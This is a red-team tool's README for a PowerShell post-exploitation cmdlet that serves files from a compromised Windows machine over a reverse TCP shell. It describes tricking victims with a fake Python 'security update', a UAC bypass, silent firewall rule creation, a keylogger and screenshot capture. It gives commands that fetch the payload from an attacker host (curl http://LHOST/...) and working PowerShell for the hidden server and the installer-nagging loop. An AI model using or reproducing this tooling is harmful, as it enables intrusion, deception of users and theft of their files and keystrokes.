cmdlet to download files from a compromised target machine
'cmdlet to read/browse/download files from a compromised target machine (Windows)'.
Author: r00t-3xp10it (SSA RedTeam @2020)
Tested Under: Windows 10 - Build 18363
Required Dependencies: python (http.server)
Optional Dependencies: curl|BitsTransfer
PS cmdlet Dev version: v1.17
[1] - The Reason Why
[2] - Cmdlet Description
[3] - Cmdlet Parameters
[4] - Remarks|Final Notes
[5] - Download Cmdlet
[6] - Get-Help Cmdlet
[7] - Report Issues
venom amsi evasion agents are reverse TCP shells written in different languages (PS | Python | C-exe).
That means the attacker gets back a 'cmd prompt' to interact with the remote system. A few days ago in a GitHub
conversation @europol
asked me how to download files from a compromised machine using shell access,
'because many of the native tools installed require some type of authentication or administrator privileges'.
My response: use python http.server (userland) on the target machine to build a web server, and then access it from the
attacker web browser to be able to read/download/browse directories. <= REMARK: http.server is limited to
what the remote directory ACL permissions
(R)(W)(F) allow (depending on shell privileges).
His response: And if the target machine does not have python (http.server) installed?
My response: Use a social engineering technique to trick the target user into installing python.
Final Notes: webserver.ps1
- IF executed through the powershell -WindowStyle Hidden
parameter then it runs in a hidden terminal, and the only thing the target user sees is the MsgBox alerting that one python security update is available (pending) and the python Windows installer spawning from time to time ([<-SForce>][<-STime>] configured loops). IF the target system already has python installed then the webserver is simply started silently, with no interaction with the target and no terminal pop-ups.
- IF executed with administrator privileges then this cmdlet adds one firewall rule so the server's incoming connections are allowed silently.
- IF the shell does not have admin privileges, then the 'ComputerDefaults.exe' EOP (an auto-elevation UAC bypass) is used to create the firewall rule.
- If you wish to delete the firewall rule manually: netsh advfirewall firewall delete rule name="python.exe"
(admin)
[^] - Jump to Top
This cmdlet was written to give venom amsi evasion reverse TCP shells (agents) the ability to download files from the target machine. It uses social engineering to trick the target user into installing Python-3.9.0.exe as a python security update (if the target user does not have python installed). This cmdlet uses the curl|Start-BitsTransfer native binaries (LolBins) to download the python Windows installer from www.python.org - The following 4 steps describe how to use webserver.ps1 from venom reverse TCP shells
1º - Place this cmdlet in the attacker machine apache2 webroot (bash prompt)
cp venom/aux/webserver.ps1 /var/www/html/webserver.ps1
2º - Then upload the webserver using the reverse TCP shell prompt
cmd /c curl http://LHOST/webserver.ps1 -o %tmp%\webserver.ps1
3º - Now remotely execute the webserver using the reverse TCP shell prompt
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SForce 3 -SEnum Verbose
4º - On the attacker PC access 'http://RHOST:8086/'
(web browser) to read/browse/download files.
** Advantages of using this script instead of executing: python -m http.server LHOST LPORT
on the reverse shell prompt **
1º - This cmdlet uses a social engineering technique to trick the target user into installing python http.server (IF needed).
And it was written to be a venom amsi evasion (handler) auxiliary, with the obvious advantages (hidden execution)
and an abundance of post-exploitation functions available such as keyloggers, desktop screenshot capture, etc...
2º - This script executes the python process (python -m http.server) detached (background) from the parent process.
Contrary to executing the command directly from the reverse TCP shell prompt, where the only way to kill the server process
is to press CTRL+C
directly in the reverse TCP shell prompt. <= That action not only stops the server (python)
but also stops our reverse TCP connection. Using the webserver.ps1 script prevents this behaviour because it runs the server
(python orphan process) and @webserver.ps1 (the powershell parent process) as separate, detached processes.
3º - This cmdlet also allows users to capture screenshots of mouse clicks using the [<-SPsr>] parameter, with the
help of the psr.exe native Windows 10 (Problem Steps Recorder) LolBin. It enumerates browser information using [<-SEnum>]
and bypasses the remote firewall 'incoming connection' warning prompts (with administrator or userland privileges on the shell).
4º - This cmdlet allows multiple server sessions on different ports/directories, so many servers can run at the same time.
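The detached-server pattern from the 4 steps and the Advantages section above, written out as stand-alone PowerShell functions. This is an added example, not code from webserver.ps1 or the venom project. It assumes python.exe (3.7 or newer, for --directory) is on PATH, that the shell can read the directory being served, and that the firewall rule is named "python.exe" as the notes above state; the port and path values are illustrative.

```powershell
# Added example (not the project's webserver.ps1 code): start python's http.server as a
# detached process, confirm the listener, enumerate running servers and stop one by PID.
# Assumptions: python.exe 3.7+ on PATH, $Root readable by the current user, rule name
# "python.exe" as described on the page; all port/path values are illustrative.

function Start-HttpShare {
    param(
        [string]$Root = "$Env:USERPROFILE",
        [int]$Port    = 8086,
        [string]$Bind = '0.0.0.0'
    )
    # Start-Process creates python as a separate process with its own (hidden) console, so a
    # CTRL+C typed into the reverse shell never reaches it and losing the shell does not kill
    # the server. -PassThru returns the Process object so we can track the PID.
    $p = Start-Process -FilePath 'python.exe' `
        -ArgumentList @('-m', 'http.server', "$Port", '--bind', $Bind, '--directory', "`"$Root`"") `
        -WindowStyle Hidden -PassThru
    Start-Sleep -Seconds 2
    if ($p.HasExited) {
        throw "python exited early with code $($p.ExitCode) (port already in use? bad path?)"
    }
    # Confirm the listener is really up on the requested port before reporting success
    $listen = Get-NetTCPConnection -State Listen -LocalPort $Port -OwningProcess $p.Id `
                                   -ErrorAction SilentlyContinue
    if (-not $listen) {
        Stop-Process -Id $p.Id -Force
        throw "python is running but nothing is listening on port $Port"
    }
    [pscustomobject]@{ PID = $p.Id; Port = $Port; Bind = $Bind; Root = $Root }
}

function Get-HttpShare {
    # Equivalent of -Sessions List: every python process whose command line runs http.server,
    # with the port it is listening on ($null if it is still starting or already gone)
    Get-CimInstance Win32_Process -Filter "Name='python.exe'" |
        Where-Object { $_.CommandLine -match 'http\.server' } |
        ForEach-Object {
            $port = Get-NetTCPConnection -State Listen -OwningProcess $_.ProcessId `
                                         -ErrorAction SilentlyContinue |
                    Select-Object -First 1 -ExpandProperty LocalPort
            [pscustomobject]@{ PID = $_.ProcessId; Port = $port; CommandLine = $_.CommandLine }
        }
}

function Stop-HttpShare {
    param([Parameter(Mandatory)][int]$Id)
    # Equivalent of -Sessions <PID>: stop one server without touching the reverse shell
    Stop-Process -Id $Id -Force -ErrorAction Stop
}

function Test-HttpShareFirewallRule {
    # Check whether the inbound rule named "python.exe" is present. netsh prints
    # "No rules match the specified criteria." when it is absent. Removing it needs admin:
    #   netsh advfirewall firewall delete rule name="python.exe"
    $out = netsh advfirewall firewall show rule name="python.exe" 2>&1 | Out-String
    return ($out -notmatch 'No rules match')
}

# Usage: serve the Desktop on 8111, list what is running, report the firewall state,
# browse http://<RHOST>:8111/ from the attacker side, then stop only that server.
$share = Start-HttpShare -Root "$Env:USERPROFILE\Desktop" -Port 8111
Get-HttpShare | Format-Table -AutoSize
"firewall rule 'python.exe' present: $(Test-HttpShareFirewallRule)"
Stop-HttpShare -Id $share.PID
```

Because each server is found by its command line and owning PID rather than by a fixed port, the same three functions cover several concurrent sessions on different ports and directories, which is the multi-session behaviour item 4º describes. Note that http.server performs no authentication: once bound to the host address, anyone who can reach the port can browse the same files.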
[^] - Jump to Top
parameter | description | type | default value |
---|---|---|---|
-SPath | webserver working directory absolute path (remote) | string | "$Env:userprofile" |
-SPort | webserver http port to use (recommended range 8080 to 8999) | int | 8086 |
-SBind | webserver IP address to bind (localhost or an IP address) | string | $null |
-SForce | execute the python Windows installer 'xx' times (loop), checking after each execution whether python was installed successfully in order to exit the loop, OR exiting when the number of attempts set by [<-SForce>] is reached | int | 0 |
-STime | delay, in seconds, between [<-SForce>] loops; 4 extra seconds are added to the value. e.g. -STime 26 (26+4=30) == delay of 30 sec between each [<-SForce>] loop | int | 26 |
-SRec | capture remote desktop screenshots before continuing webserver execution. The screenshots are saved in the remote $Env:TMP folder for later review. Capture 5 remote desktop screenshots: .\webserver.ps1 -SRec 5 | int | 0 |
-SRDelay | delay, in seconds, between each screenshot capture (screenshot capture loop) | int | 2 |
-SPsr | capture screenshots of mouse clicks for 'xx' seconds. Remark: 'the minimum accepted capture time is 8 seconds'. Capture user clicks + screenshots for 8 seconds: .\webserver.ps1 -SPsr 8 | int | 0 |
-SEnum | remote host web browser enumeration: DHCP, User-Agent, default browser, TCP headers, TCP connections, active tab title, default browser install path, browser version, etc. Enumerate browser settings: .\webserver.ps1 -SEnum True. Aggressive (verbose) enumeration: .\webserver.ps1 -SEnum Verbose | string | False |
-Sessions | enumerate/kill active @webserver sessions. This parameter cannot be combined with other parameters. Enumerate active sessions: .\webserver.ps1 -Sessions List. Stop a session by its PID: .\webserver.ps1 -Sessions 1234 | string | False |
-SKill | kill the python (@webserver) remote process(es) in 'xx' seconds. This parameter cannot be combined with other parameters. Kill the webserver in 2 seconds: .\webserver.ps1 -SKill 2 | int | 0 |
-Download | download a file from the attacker apache2 webroot into the @webserver remote working directory (Remark: 'double quotes are mandatory in value inputs'). This parameter cannot be combined with other parameters. Syntax: .\webserver.ps1 -Download "<apache2-IP>,<FileName.ps1>". Download a file: .\webserver.ps1 -Download "192.168.1.73,Client.ps1" | string | False |
-Keylogger | capture remote host keystrokes ($Env:TMP\void.exe\|void.log). Capture remote host keystrokes: .\webserver.ps1 -Keylogger Start. Stop the keylogger process and delete its files: .\webserver.ps1 -Keylogger Stop | string | False |
-EOP | find missing patches usable for privilege escalation. This parameter cannot be combined with other parameters. Find missing KB patches: .\webserver.ps1 -EOP HOTFIXS. Find missing software patches: .\webserver.ps1 -EOP CVE. Find missing software patches and list KBs: .\webserver.ps1 -EOP ALL | string | False |
Some syntax examples.
powershell -W 1 -File "$Env:TMP\webserver.ps1"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SPsr 25 -SBind 127.0.0.1 -SPort 8090
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SForce 3 -STime 6 -SRec 3 -SEnum True
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SPort 8111 -SPath "$Env:USERPROFILE\Desktop"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -Download "192.168.1.73,Client.ps1"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -Sessions List
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SKill 2
- A list of cmdline commands (to execute in reverse TCP shell(s)) can be found
here
- In [<-SPath>] parameter declarations it is recommended to use double "..." quotes.
- webserver.ps1 does not require admin privileges to work (but it is limited by
ACL permissions
(R)(W)).
- IF no IP address to bind is set with [<-SBind>] then webserver.ps1 auto-binds the target host IP address. Keep in mind that http.server has no authentication of its own, so anyone who can reach that address and port can browse the same directory.
- All webserver.ps1 parameters are
NOT positional,
which means they can be passed in any order we like.
- The loop function stops
=>
IF a 'python installation is found', OR =>
IF the number of attempts 'set by [<-SForce>]' is reached.
- In the reverse TCP shell (handler) execute the webserver using:
eg. powershell -W 1 -File "$env:TMP\webserver.ps1"
OR else .\webserver.ps1 [<-parameter>]
The command will NOT present any output on the reverse TCP shell handler.
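The [<-SForce>]/[<-STime>] loop and its two stop conditions, as listed in the remarks above and in the parameter table, written out as an added example; this is not the project's code. The installer path is an assumption, the MsgBox/social-engineering prompt the page describes is deliberately left out, and the "is python installed?" check uses the registry keys a python.org installer writes (PEP 514) rather than a PATH lookup.

```powershell
# Added example (not the project's code): the -SForce/-STime retry loop with a reliable
# "python installed?" check. Assumptions: $Installer path is illustrative; the page's
# MsgBox prompt is not reproduced; detection relies on the PEP 514 registry keys.

function Test-PythonInstalled {
    # A python.org install registers itself under Software\Python\PythonCore (PEP 514).
    # Get-Command python.exe is NOT a reliable check on Windows 10: the Microsoft Store
    # "app execution alias" stub also answers to that name before anything is installed.
    $keys = 'HKCU:\Software\Python\PythonCore', 'HKLM:\Software\Python\PythonCore'
    foreach ($k in $keys) {
        if (Get-ChildItem -Path $k -ErrorAction SilentlyContinue) { return $true }
    }
    return $false
}

function Invoke-InstallerLoop {
    param(
        [string]$Installer = "$Env:TMP\python-3.9.0.exe",   # assumed location
        [int]$SForce = 0,    # number of attempts; 0 means the installer is never run
        [int]$STime  = 26    # delay between attempts; 4 s are added on top (26+4 = 30 s)
    )
    for ($attempt = 1; $attempt -le $SForce; $attempt++) {
        # Stop condition 1: a python installation is found
        if (Test-PythonInstalled) { return "python found, loop stopped before attempt $attempt" }
        # Spawn the installer for the user, then come back after the delay and re-check
        Start-Process -FilePath $Installer -ErrorAction SilentlyContinue | Out-Null
        Start-Sleep -Seconds ($STime + 4)
    }
    if (Test-PythonInstalled) { return "python found after $SForce attempt(s)" }
    # Stop condition 2: the number of attempts set by -SForce was reached
    return "gave up: $SForce attempt(s) reached without a python installation"
}

# Usage: up to 3 attempts, 10 seconds (6+4) apart, mirroring "-SForce 3 -STime 6" above
Invoke-InstallerLoop -SForce 3 -STime 6
```

The registry check matters in practice: on a Windows 10 host with no python installed, a PATH-based test would report success because of the Store alias stub, and the loop would exit after zero attempts with nothing to start http.server.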
[^] - Jump to Top
Wget Download|Manual download
wget https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/webserver.ps1
Get-Help .\webserver.ps1 -full
URL: CmdLine & Scripts for reverse TCP shell addicts
[^] - Jump to Top